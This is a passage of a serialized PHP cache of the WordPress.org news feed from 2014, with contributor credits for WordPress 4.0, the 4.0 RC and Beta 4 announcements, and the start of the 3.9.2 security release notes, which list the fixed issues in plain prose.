href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jacklenox\">Jack Lenox</a>, <a href=\"https://profiles.wordpress.org/jackreichert\">Jack Reichert</a>, <a href=\"https://profiles.wordpress.org/jacobdubail\">Jacob Dubail</a>, <a href=\"https://profiles.wordpress.org/janhenkg\">JanHenkG</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jaza613\">Jaza613</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jpry\">Jeremy Pry</a>, <a href=\"https://profiles.wordpress.org/slimndap\">Jeroen Schmit</a>, <a href=\"https://profiles.wordpress.org/jerrysarcastic\">Jerry Bates (jerrysarcastic)</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jesper800\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jgadbois\">jgadbois</a>, <a href=\"https://profiles.wordpress.org/jartes\">Joan Artes</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joehoyle\">Joe Hoyle</a>, <a href=\"https://profiles.wordpress.org/jkudish\">Joey Kudish</a>, <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/johnzanussi\">John Zanussi</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jonnyauk\">jonnyauk</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/jjeaton\">Josh Eaton</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/juliobox\">Julio Potier</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/greenshady\">Justin Tadlock</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kapeels\">kapeels</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kworthington\">Kevin Worthington</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/leewillis77\">Lee Willis</a>, <a href=\"https://profiles.wordpress.org/lessbloat\">lessbloat</a>, <a href=\"https://profiles.wordpress.org/layotte\">Lew Ayotte</a>, <a href=\"https://profiles.wordpress.org/lritter\">lritter</a>, <a href=\"https://profiles.wordpress.org/lukecarbis\">Luke Carbis</a>, <a href=\"https://profiles.wordpress.org/lgedeon\">Luke Gedeon</a>, <a href=\"https://profiles.wordpress.org/m_i_n\">m_i_n</a>, <a href=\"https://profiles.wordpress.org/funkatronic\">Manny Fleurmond</a>, <a href=\"https://profiles.wordpress.org/targz-1\">Manuel Schmalstieg</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/mjbanks\">Matt Banks</a>, <a href=\"https://profiles.wordpress.org/sivel\">Matt Martz</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mdbitz\">Matthew Denton</a>, <a href=\"https://profiles.wordpress.org/mattheweppelsheimer\">Matthew Eppelsheimer</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattyrob\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/meekyhwang\">meekyhwang</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/midxcat\">midxcat</a>, <a href=\"https://profiles.wordpress.org/mauteri\">Mike Auteri</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mikelittle\">Mike Little</a>, <a href=\"https://profiles.wordpress.org/mikemanger\">Mike Manger</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/dimadin\">Milan Dinic</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/usermrpapa\">Mr Papa</a>, <a href=\"https://profiles.wordpress.org/mrmist\">mrmist</a>, <a href=\"https://profiles.wordpress.org/m_uysl\">Mustafa Uysal</a>, <a href=\"https://profiles.wordpress.org/muvimotv\">MuViMoTV</a>, <a href=\"https://profiles.wordpress.org/nabil_kadimi\">nabil_kadimi</a>, <a href=\"https://profiles.wordpress.org/namibia\">Namibia</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/nd987\">nd987</a>, <a href=\"https://profiles.wordpress.org/neil_pie\">Neil Pie</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nbachiyski\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/schoenwaldnils\">Nils Schonwald</a>, <a href=\"https://profiles.wordpress.org/ninos-ego\">Ninos</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/compute\">Patrick Hesselberg</a>, <a href=\"https://profiles.wordpress.org/pbearne\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pdclark\">Paul Clark</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/philipjohn\">Philip John</a>, <a href=\"https://profiles.wordpress.org/senlin\">Piet Bos</a>, <a href=\"https://profiles.wordpress.org/psoluch\">Piotr Soluch</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/purzlbaum\">purzlbaum</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rclations\">RC Lations</a>, <a href=\"https://profiles.wordpress.org/iamfriendly\">Richard Tape</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/rob1n\">rob1n</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rdall\">Robert Dall</a>, <a href=\"https://profiles.wordpress.org/harmr\">RobertHarm</a>, <a href=\"https://profiles.wordpress.org/rohan013\">Rohan Rawat</a>, <a href=\"https://profiles.wordpress.org/rhurling\">Rouven Hurling</a>, <a href=\"https://profiles.wordpress.org/ruudjoyo\">Ruud Laan</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sammybeats\">Sam Brodie</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sathishn\">Sathish Nagarajan</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/greglone\">ScreenfeedFr</a>, <a href=\"https://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"https://profiles.wordpress.org/seanchayes\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/nessworthy\">Sean Nessworthy</a>, <a href=\"https://profiles.wordpress.org/sergejmueller\">Sergej Muller</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shanebp\">shanebp</a>, <a href=\"https://profiles.wordpress.org/sharonaustin\">Sharon Austin</a>, <a href=\"https://profiles.wordpress.org/shaunandrews\">Shaun Andrews</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/sphoid\">sphoid</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stompweb\">Steven Jones</a>, <a href=\"https://profiles.wordpress.org/strangerstudios\">strangerstudios</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/t4k1s\">t4k1s</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/taylorde\">Taylor Dewey</a>, <a href=\"https://profiles.wordpress.org/thomasvanderbeek\">Thomas van der Beek</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/codenameeli\">Tim \'Eli\' Dalbey</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/willmot\">Tom Willmot</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/torresga\">torresga</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/treyhunner\">treyhunner</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/winterdev\">winterDev</a>, <a href=\"https://profiles.wordpress.org/wojtekszkutnik\">Wojtek Szkutnik</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/katzwebdesign\">Zack Katz</a>, <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>, and <a href=\"https://profiles.wordpress.org/zoerooney\">Zoe Rooney</a>. Also thanks to <a href=\"http://michaelpick.wordpress.com/\">Michael Pick</a> for producing the release video, and Helen with <a href=\"http://adriansandi.com\">Adrián Sandí</a> for the music.</p>\n<p>If you want to follow along or help out, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>. Thanks for choosing WordPress. See you soon for version 4.1!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/09/benny/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.0 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Aug 2014 12:20:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3287\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:321:\"The first release candidate for WordPress 4.0 is now available! In RC 1, we’ve made refinements to what we’ve been working on for this release. Check out the Beta 1 announcement post for more details on those features. We hope to ship WordPress 4.0 next week, but we need your help to get there. If you […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2134:\"<p>The first release candidate for WordPress 4.0 is now available!</p>\n<p>In RC 1, we’ve made refinements to what we’ve been working on for this release. Check out the <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">Beta 1 announcement post</a> for more details on those features. We hope to ship WordPress 4.0 <em>next week</em>, but we need your help to get there. If you haven’t tested 4.0 yet, there’s no time like the present. (Please, not on a production site, unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug? </strong>Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.0 RC1, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.0, visit the awesome About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png?w=692\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar).</p>\n<p><strong>Developers,</strong> please test your plugins and themes against WordPress 4.0 and update your plugin’s <em>Tested up to</em> version in the readme to 4.0 before next week. If you find compatibility problems, please be sure to post any issues to the support forums so we can figure those out before the final release. You also may want to <a href=\"https://make.wordpress.org/core/2014/08/21/introducing-plugin-icons-in-the-plugin-installer/\">give your plugin an icon</a>, which we launched last week and will appear in the dashboard along with banners.</p>\n<p><em>It is almost time</em><br />\n<em> For the 4.0 release</em><br />\n<em> And its awesomeness</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.0 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 15 Aug 2014 05:06:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3280\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"The fourth and likely final beta for WordPress 4.0 is now available. We’ve made more than 250 changes in the past month, including: Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes. Better handling of small screens in the media library modals. A separate bulk selection mode […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2003:\"<p>The fourth and likely final beta for WordPress 4.0 is now available. We’ve made <a href=\"https://core.trac.wordpress.org/log?rev=29496&stop_rev=29229&limit=300\">more than 250 changes</a> in the past month, including:</p>\n<ul>\n<li>Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes.</li>\n<li>Better handling of small screens in the media library modals.</li>\n<li>A separate bulk selection mode for the media library grid view.</li>\n<li>Improvements to the installation language selector.</li>\n<li>Visual tweaks to plugin details and customizer panels.</li>\n</ul>\n<p><strong>We need your help</strong>. We’re still aiming for a release this month, which means the next week will be critical for identifying and squashing bugs. If you’re just joining us, please see <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">the Beta 1 announcement post</a> for what to look out for.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums, where friendly moderators are standing by. <b>Plugin developers</b><strong>,</strong> if you haven’t tested WordPress 4.0 yet, now is the time — and be sure to update the “tested up to” version for your plugins so they’re listed as compatible with 4.0.</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.0, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-beta4.zip\">download the beta here</a> (zip).</p>\n<p><em>We are working hard</em><br />\n<em>To finish up 4.0<br />\n</em><em>Will you help us too?</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 3.9.2 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Aug 2014 19:04:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3269\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:377:\"WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately. This release fixes a possible denial of service issue in PHP’s XML processing, reported by Nir Goldshlager of the Salesforce.com Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2353:\"<p>WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately.</p>\n<p>This release fixes a possible denial of service issue in PHP’s XML processing, reported by <a href=\"https://twitter.com/nirgoldshlager\">Nir Goldshlager</a> of the Salesforce.com Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress security team and David Rothstein of the <a href=\"https://www.drupal.org/SA-CORE-2014-004\">Drupal security team</a>. This is the first time our two projects have coordinated joint security releases.</p>\n<p>WordPress 3.9.2 also contains other security changes:</p>\n<ul>\n<li>Fixes a possible but unlikely code execution when processing widgets (WordPress is not affected by default), discovered by <a href=\"http://www.buayacorp.com/\">Alex Concha</a> of the WordPress security team.</li>\n<li>Prevents information disclosure via XML entity attacks in the external GetID3 library, reported by <a href=\"http://onsec.ru/en/\">Ivan Novikov</a> of ONSec.</li>\n<li>Adds protections against brute attacks against CSRF tokens, reported by <a href=\"http://systemoverlord.com/\">David Tomaschik</a> of the Google Security 